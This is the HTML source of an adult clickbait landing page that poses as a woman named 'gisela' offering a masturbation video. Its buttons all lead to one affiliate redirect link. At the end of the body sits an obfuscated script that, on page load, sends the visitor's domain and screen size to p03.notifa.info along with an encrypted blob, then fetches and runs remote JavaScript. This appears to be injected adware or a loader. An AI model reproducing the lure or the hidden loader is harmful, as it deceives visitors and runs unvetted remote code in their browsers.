<!DOCTYPE html>
<html lang="es" >

<head>
  <meta charset="UTF-8">
  <title>Adult Only</title>
  <meta name="robots" content="NOINDEX,NOFOLLOW,NOARCHIVE" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <meta name="author" content="XXX" />
  <meta name="description" content="18+"/>


      <style>

      @import url('https://fonts.googleapis.com/css?family=Kalam');
      @import url('https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i');

       @font-face{font-family:Circular;src:url("Circular_Air-Book.woff2") format("woff2"),url("Circular_Air-Book.woff") format("woff");font-weight:normal;font-style:normal}
    @font-face{font-family:Circular;src:url("Circular_Air-Book_Italic.woff2") format("woff2"),url("Circular_Air-Book_Italic.woff") format("woff");font-weight:normal;font-style:italic}
    @font-face{font-family:Circular;src:url("Circular_Air-Bold.woff2") format("woff2"),url("Circular_Air-Bold.woff") format("woff");font-weight:700;font-style:normal}
    @font-face{font-family:Circular;src:url("Circular_Air-Light.woff2") format("woff2"),url("Circular_Air-Light.woff") format("woff");font-weight:300;font-style:normal}
    @font-face{font-family:Circular;src:url("Circular_Air-Light.woff2") format("woff2"),url("Circular_Air-Light.woff") format("woff");font-weight:200;font-style:normal}

      .form-control::-moz-placeholder{
         color: #DDDDDD;
         opacity: 1;
      }
      .form-control:-moz-placeholder{
         color: #DDDDDD;
         opacity: 1;  
      }  
      .form-control::-webkit-input-placeholder{
         color: #DDDDDD;
         opacity: 1; 
      } 
      .form-control:-ms-input-placeholder{
         color: #DDDDDD;
         opacity: 1; 
      }

      /* NOTE: The styles were added inline because Prefixfree needs access to your styles and they must be inlined if they are on local disk! */
      * { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; }
      *:before, *:after { -webkit-box-sizing: inherit; -moz-box-sizing: inherit; box-sizing: inherit; }

      html { background: #000; font-family: Circular,-apple-system,BlinkMacSystemFont,Roboto,Helvetica Neue,sans-serif !important; color: #fff; text-align: center; height: 100%; }
      body { height: 100%;   }

      #video-viewport { position: absolute; top: 0; left: 0; width: 100%; height: 100%; overflow: hidden; z-index: -1; }
      video { display: block; width: 100%; height: auto; }

      .fullsize-video-bg { height: 100%; overflow: hidden; }

      .fullsize-video-bg:before { content: ""; background: rgba(0,0,0,.35); position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 0; }
      .fullsize-video-bg:after {    content: "";
    position: absolute;
    bottom: 0;
    left: 0;
    width: 100%;
    height: 40%;
    z-index: 0;
    background: -moz-linear-gradient(top, rgba(0,0,0,0) 0%, rgba(0,0,0,0.65) 100%);
    background: -webkit-linear-gradient(top, rgba(0,0,0,0) 0%,rgba(0,0,0,0.65) 100%);
    background: linear-gradient(to bottom, rgba(0,0,0,0) 0%,rgba(0,0,0,0.65) 100%);
    filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#00000000', endColorstr='#a6000000',GradientType=0 ); }


      .fullsize-video-bg .inner { filter: none; display: table; width: 100%; max-width: 30em; height: 100%; margin: 0 auto; padding: 0; position: relative; z-index: 2; text-shadow: 0 1px 5px rgba(0,0,0,.5); }
      .fullsize-video-bg .inner > div { text-align: center; display: table-cell; vertical-align: bottom; padding:0 10px 10px 10px;}

      h1 { font-family: Playfair Display; font-size: 1.9em; line-height: 1.1; font-weight: 900;  margin-bottom: 10px; letter-spacing: 3px; }
      h1 + p { font-family: Circular,-apple-system,BlinkMacSystemFont,Roboto,Helvetica Neue,sans-serif !important; font-size: 18px;  line-height: 25px; font-weight: 100;}

      #video-viewport {background: url(https://tinyurl.com/s2fr3te) no-repeat center; background-size: cover; }
      
      small.copy {padding:20px 0 0 0;display: block;font-size: 11px;}

      img.imgProfile {border-radius: 200px;width:100px;margin:0 0 10px 0;}
      ul.profiles li a {display:block;width: 100%;text-align: left;margin:10px 0 0 0;padding:14px;border-radius:5px;color:#FFF;text-decoration: none;text-transform:uppercase;}
      ul.profiles li a span {color:#FFF;font-size:35px;margin:0 5px 0 0;}
      ul.profiles li a b {position: relative;top:-5px;}

      .bgInstagram {background: rgb(241, 57, 89);}

      .bgPublicSnapchat {background: rgb(251, 222, 48);}
      .bgPrivateSnapchat {background:rgb(63, 101, 166);}

@media (min-width: 768px) {

      #video-viewport {background: url(https://tinyurl.com/s2fr3te) no-repeat center!important; background-size: cover; }
}


    </style>


</head>
   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4334769,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4334769&101" alt="website statistics" border="0"></a></noscript>
<!-- Histats.com  END  -->
<body>



  <section class="fullsize-video-bg">
  	<div class="inner">
  		<div>
          <h1>gisela</h1>
          <p>prepare yourself to watch my masturbation video and be careful not to be addicted after watching it Tap the button below to continue [ CLICK BELOW ]</p>

          <ul class="profiles">


          

            <li>
              <a href="https://securecloud-smart.com/?a=96172&c=174995&s1=GANDEN&s2=YELLOWCORPS" target="_blank" class="bgPrivateSnapchat">
                <span class="fa fa-instagram"></span> 
                <b>NUDE VIDEOS [ CLICK HERE ]</b>
              </a>
			   <a href="https://securecloud-smart.com/?a=96172&c=174995&s1=GANDEN&s2=YELLOWCORPS" target="_blank" class="bgPrivateSnapchat">
                <span class="fa fa-instagram"></span> 
                <b>SNAPCHAT [ CLICK HERE ]</b>
              </a>
			   <a href="https://securecloud-smart.com/?a=96172&c=174995&s1=GANDEN&s2=YELLOWCORPS" target="_blank" class="bgPrivateSnapchat">
                <span class="fa fa-instagram"></span> 
                <b>GROUPCHAT [ CLICK HERE ]</b>
            </li>

            
          </ul>
          

  		</div>


  	</div>
  	<div id="video-viewport"></div>

  </section>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAzY7g1EFkl%2bZ%2bOJjz%2bCqYscq4L2FYT4gmwZFWf1oLiF5iqBL%2fFNWDS289mCDubon8HqRjk3qHGDwm%2fgSDZUz%2fnE9UxGRcj3cMW8AFjxL29v4SlpXsjO1foVD1vJ5PElyX67VPQPA7M01riBUADcjlawIHzvNKNLYy8TlllInN5LFVDwGp%2bqAEcuvLNDK3sS8tCwiDBH6ahErsP6V9dvgW%2fPfiViSVZyUBl6exU1J5ryBvSGrbIDwz62NnNGf9aJKjJtg6OhpB63G8etO6R0i9EWnRM9qcBZRVwrKceGBxvsA6Nft%2bvMeLftxPXBmW7LBHyBnAzF4RwPQUxdOm4hseMb%2fiax%2fh2ljAiFWMGTYxRHFrT0JwkpsuQElEMMC4mLf11snRmx9RxOQZywAnwC3Q5Rg1r2MLNbjQ%2ffo3zBELRhQJcc8qTzaG6ptlz%2bt%2fWcG0kmP9xLq0boUdIuxNdaWZFXZgHhA9OVIyi%2bnh5So%2bw0uPZ2myM2Ns3rtRgp8H6eTejGdf0fVAofMr23gCOjx3jb6CAwX7aXxhR8Rw0SWsyHi0pTj2XKf28g%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>




</html>